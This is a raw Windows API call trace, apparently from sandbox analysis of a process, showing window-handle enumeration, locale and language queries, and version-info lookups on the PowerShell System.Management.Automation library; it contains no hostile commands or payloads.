	[0321.299] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x88c
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb04
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x910
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x230
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xac0
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xab4
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xaac
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x3d0
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x978
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa7c
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x59c
	[0321.300] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa88
	[0321.300] GetWindow (hWnd=0x20212, uCmd=0x4) returned 0x0
	[0321.301] IsWindowVisible (hWnd=0x20212) returned 0
	[0321.301] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa6c
	[0321.301] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa68
	[0321.301] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x9f8
	[0321.301] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa04
	[0321.301] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x924
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x8dc
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7dc
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x768
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x764
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x820
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x810
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x794
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x83c
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7ac
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb44
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb5c
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x838
	[0321.302] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x818
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x5b8
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x494
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x1ec
	[0321.303] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x440
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7e8
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x730
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x2c8
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x31c
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x330
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x128
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x5c8
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x6f8
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x358
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x73c
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb0
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x250
	[0321.304] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x240
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x790
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x61c
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x540
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x538
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x568
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x538
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x568
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x538
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x540
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x540
	[0321.305] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x57c
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x554
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x528
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x79c
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4e0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.306] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x44c
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x778
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x558
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xde0
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xddc
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xdd8
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd34
	[0321.307] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd10
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd0c
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc9c
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc74
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc1c
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc08
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xabc
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x24c
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xbb0
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xbfc
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb10
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x374
	[0321.308] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x368
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb28
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xae8
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb14
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x95c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa8c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x46c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb3c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa90
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xad0
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa9c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xaa0
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb1c
	[0321.309] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7e0
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa74
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x694
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa28
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x9b0
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x8d8
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x940
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x93c
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4ec
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x150
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x720
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x3c4
	[0321.310] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7d4
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x6c8
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb54
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb54
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb5c
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x838
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x818
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x5b8
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x494
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x1ec
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x440
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x7e8
	[0321.311] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x730
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x2c8
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x31c
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x330
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x128
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x5c8
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x6f8
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x358
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x73c
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb0
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x250
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x240
	[0321.312] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x790
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x61c
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x568
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x538
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x540
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x79c
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4e0
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.313] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x778
	[0321.317] WerSetFlags () returned 0x0
	[0321.323] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0321.769] CoTaskMemFree (pv=0x0) 
	[0321.769] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd60 | out: pulNumLanguages=0xcdd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd60) returned 1
	[0321.770] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd68, pwszLanguagesBuffer=0x2ad1458, pcchLanguagesBuffer=0xcdd60 | out: pulNumLanguages=0xcdd68, pwszLanguagesBuffer=0x2ad1458, pcchLanguagesBuffer=0xcdd60) returned 1
	[0321.776] CoTaskMemAlloc (cb=0x24) returned 0x3612e0
	[0321.776] GetUserDefaultLocaleName (in: lpLocaleName=0x3612e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0321.776] CoTaskMemFree (pv=0x3612e0) 
	[0321.802] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0321.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.802] CoTaskMemFree (pv=0x34eb50) 
	[0321.804] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0321.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.804] CoTaskMemFree (pv=0x34eb50) 
	[0321.807] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0321.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.807] CoTaskMemFree (pv=0x34eb50) 
	[0322.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.298] SetErrorMode (uMode=0x1) returned 0x1
	[0322.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9e0 | out: lpFileInformation=0xcd9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0322.298] SetErrorMode (uMode=0x1) returned 0x1
	[0322.298] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc50 | out: lpdwHandle=0xcdc50) returned 0x94c
	[0322.299] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ad4ce8 | out: lpData=0x2ad4ce8) returned 1
	[0322.300] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbc8, puLen=0xcdbc0 | out: lplpBuffer=0xcdbc8*=0x2ad4d84, puLen=0xcdbc0) returned 1
	[0322.300] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4e60, puLen=0xcdb30) returned 1
	[0322.300] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0322.300] CoTaskMemAlloc (cb=0x2e) returned 0x36b7c0
	[0322.300] lstrcpyW (in: lpString1=0x36b7c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0322.300] CoTaskMemFree (pv=0x36b7c0) 
	[0322.300] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4eb4, puLen=0xcdb30) returned 1
	[0322.300] lstrlenW (lpString="System.Management.Automation") returned 28
	[0322.301] CoTaskMemAlloc (cb=0x3c) returned 0x369ed0
	[0322.301] lstrcpyW (in: lpString1=0x369ed0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0322.301] CoTaskMemFree (pv=0x369ed0) 
	[0322.301] VerQueryValueW (in: pBlock=0x2ad4ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb38, puLen=0xcdb30 | out: lplpBuffer=0xcdb38*=0x2ad4f10, puLen=0xcdb30) returned 1
	[0322.301] lstrlenW (lpString="6.1.7601.17514") returned 14
